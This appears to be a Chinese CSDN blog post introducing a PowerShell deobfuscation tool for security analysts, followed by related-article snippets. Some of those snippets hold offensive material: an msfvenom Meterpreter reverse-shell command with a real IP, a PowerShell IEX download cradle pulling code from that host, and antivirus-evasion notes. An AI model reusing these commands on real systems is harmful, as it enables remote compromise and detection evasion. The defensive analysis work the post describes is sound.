阿里云PowerShell去混淆工具(Aliyun-PSDeObfuscator)

最新推荐文章于 2024-08-09 16:00:00 发布
最新推荐文章于 2024-08-09 16:00:00 发布
阅读量293 收藏 6
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00307/article/details/140972358
版权

阿里云PowerShell去混淆工具(Aliyun-PSDeObfuscator)

aliyun-psdeobfuscator项目地址:https://gitcode.com/gh_mirrors/al/aliyun-psdeobfuscator

一、项目介绍

阿里云PowerShell去混淆工具(Aliyun-PSDeObfuscator)是一款专门用于解析和还原被混淆的PowerShell脚本的实用工具。它能够处理常见的混淆技术,如变量重命名、字符串编码及格式化等,帮助安全研究人员和系统管理员更清晰地理解潜在威胁。

二、项目快速启动

安装依赖

确保您的环境中已安装Git和.NET Core SDK。如果没有,请访问.NET Core SDK官方网站下载最新版本的SDK。

克隆仓库

在命令行中执行以下命令来克隆此GitHub仓库:

git clone https://github.com/aliyun/aliyun-psdeobfuscator.git
cd aliyun-psdeobfuscator

构建项目

构建工具以准备运行:

dotnet build

执行工具

现在你可以通过以下命令运行去混淆工具了:

dotnet run -- <your-obfuscated-powershell-script>

替换<your-obfuscated-powershell-script>为你的实际混淆脚本路径。

三、应用案例和最佳实践

应用场景

当你遇到恶意或复杂的PowerShell脚本时,该工具可以帮助你快速分析其真正意图,从而采取相应措施保护系统安全。

示例

假设我们有一个经过混淆的PowerShell脚本obfuscated.ps1,可以这样去混淆它:

dotnet run -- obfuscated.ps1

最佳实践

  • 定期更新: 确保你的工具是最新的,以应对最新的混淆技术。
  • 验证输出: 对于任何解混淆的结果进行人工审查,确认其正确性。
  • 自动化检测: 结合CI/CD流程,自动检查入库的脚本是否被混淆过。

四、典型生态项目

阿里云PowerShell去混淆工具可以与其他安全生态项目结合使用,例如:

  • 端点检测响应(EDR)解决方案:集成此工具增强对可疑行为的识别能力。
  • 源代码审计工具:配合静态代码分析工具提高代码安全性。

以上即为阿里云PowerShell去混淆工具的简介及其使用方法,希望对你在逆向工程、安全研究方面提供有力支持。如果你有任何反馈或者发现bug,请随时提交issue到GitHub仓库中。

aliyun-psdeobfuscator项目地址:https://gitcode.com/gh_mirrors/al/aliyun-psdeobfuscator

解银旦Fannie
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
多多token提取器_工具ShellCode混淆器Obfuscator
weixin_35410816的博客
01-13 2286
以前的文章中介绍过一个C#开发的混淆器AvIator,效果很是不错,但一个利器的问世会被盯上并被研究透彻后很快失效(前文url:https://mp.weixin.qq.com/cgi-bin/appmsg?t=media/appmsg_edit&action=edit&type=10&appmsgid=100000675&isMul=1&...
powershell脚本编写_病毒分析学习笔记:powershell混淆
weixin_39631370的博客
12-21 2544
本文为看雪论坛精华文章看雪论坛作者ID:OK繃目录一、前言二、自动化反混淆 混淆原理 自动化反混淆工具三、手动反混淆四、总结一、前言Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windo...
Volana:一款基于Go开发的Shell命令代码混淆工具
最新发布
FreeBuf_的博客
08-09 1540
在红队测试过程中,隐蔽性是非常重要的一个方面,许多基础设施会记录命令并实时将其发送到 SIEM,这使得事后清理部分本身毫无用处。Volana通过提供自己的 shell 运行时(输入你的命令,volana 会为你执行),提供一种在目标设备上执行的命令的隐蔽且简单的方法。因为我们希望受到保护,免受触发base64使用警报或在命令中寻找 base64 文本的系统的影响。Volana是一款功能强大的Shell命令代码混淆工具,该工具基于Go语言开发,可以帮助广大研究人员实现对Shell命令或脚本代码的混淆处理。
powershell恶意脚本解混淆
信息安全
11-11 1827
文章目录前言分析总结 前言 现在许多病毒作者为了免杀,使用powershell脚本来执行恶意行为的病毒越来越多,这次分析的一个样本就是利用powershell混淆来隐藏嵌在其中的cs后门dll 分析 样本代码 从图上可以很清晰的知道存放了一段base64数据,首先将base64数据解密,使用gzip解压,解压的数据进行执行 想要解密,也很简单: IEX用于将字符串作为命令执行,当去掉IEX后,再文件尾加上| out-file decode.txt 将 IEX (New-Object IO.StreamRe
[论文阅读] (17)CCS2019 针对PowerShell脚本的轻量级去混淆和语义感知攻击检测(经典)
杨秀璋的专栏
03-25 5197
《娜璋带你读论文》系列主要是督促自己阅读优秀论文及听取学术讲座,并分享给大家,希望您喜欢。前一篇总结了Powershell恶意代码检测相关研究,并结合开源工具分享抽象语法树提取过程。这篇文章将详细讲解CCS2019的Powershell混淆工作,这篇文章质量非常高,来自于浙江大学的李振源老师。我将从他在InforSec分享的视频和论文原文阅读两个方面进行讲解。希望这篇文章对您有所帮助,深知自己很菜,通过这种最笨分享来提升和记录,欢迎大家批评指正。这些大佬是真的值得我们去学习,献上小弟的膝盖~
PowerShell-7.2.6-win-x64.msi
10-19
PowerShell-7.2.6-win-x64 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。
PowerShell v7.2.4 最新64位安装包 PowerShell-7.2.4-win-x64.msi
05-26
安装PowerShell 7.2.4的最新64位版本(PowerShell-7.2.4-win-x64.msi)时,用户可以享受到无缝的升级体验,因为它能够与旧版本并存,不会影响到现有的PowerShell 5环境。安装过程简单直观,只需运行安装包,按照向导...
PowerShell-7.3.7-win-x64
10-01
PowerShell-7.3.7-win-x64
最新版: PowerShell-7.4.3-win-x64.msi
06-20
PowerShell-7.4.3-win-x64.msi 安装 PowerShell 是微软开发的一种命令行 shell 和脚本语言,它设计用于系统管理任务和自动化。相比传统的命令提示符(CMD),PowerShell 提供了更强大、灵活的功能集,特别是对于...
PowerShell-7.0.0-win-x64.zip
03-30
这意味着Windows PowerShellPowerShell Core用户将能够在Windows、Linux和macOS上跨越使用相同版本的PowerShell,而PowerShell 7用户将与他们所依赖的Windows PowerShell模块具有非常高的兼容性。
Invoke-Obfuscation:一款功能强大的PowerShell代码混淆工具
qq_53058639的博客
08-09 276
很多网络攻击者和商业化恶意软件正在使用一些非常基础的代码混淆技术,并尝试从powershell.exe的命令行参数中隐藏大部分命令。因此,Invoke-Obfuscation的使用非常简单,因为它支持以可视化的形式来使用和研究针对PowerShell代码和命令的混淆技术。Invoke-Obfuscation是一款功能强大的PowerShell代码混淆工具,该工具兼容PowerShell。v2.0-v5.0语法上可能存在的命令混淆问题,以便提升研究人员和反病毒产品的检测能力。本项目的开发与发布遵循[
powershell 中的字符串混淆
lacoucou的专栏
06-23 397
例子1 (VarIaBLE '*MDr*').naMe[3,11,2]-JoiN'' 执行结果是 iex 解析: PS > VarIaBLE '*MDr*' #执行命令 variable '*MDr' Name Value
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 768
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
Pcalua+Powershell混淆
reaido的博客
01-29 289
一、Pcalua加载shellcode 1、msfvenom生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1 2、混淆处理 powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.
shell脚本代码混淆
ZXW_NUDT的博客
11-04 1923
shell脚本代码混淆
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 858
免杀对抗-Powershell-混淆无文件
linux代码混淆工具,如何在Windows和Linux服务器中检测混淆命令
weixin_39814088的博客
05-07 358
工具介绍在目前的无文件恶意软件或网络犯罪领域中,命令行混淆已经是很常见的了。为了绕过基于签名的安全检测机制,红队渗透测试以及APT攻击活动都会使用各种专用的混淆/模糊技术。同时,许多代码混淆工具(即执行语法转换工具)都已开源,这也使得网络攻击者们对给定命令进行混淆处理变得越来越容易了。然而,针对这类技术的防御工具却仍然很少。针对Linux的命令行混淆,我们几乎找不到任何可以使用的检测工具。在防范W...
使用PowerShell 3.0高效管理Hyper-V 3.0
"这篇文章主要介绍了如何使用PowerShell 3.0来管理Hyper-V 3.0,强调了PowerShell ISE在Windows Server 8中新增的智能感知功能,并且对比了PowerGUI Script Editor。文中详细讲解了如何创建VHDX虚拟磁盘、查看虚拟机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

解银旦Fannie

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值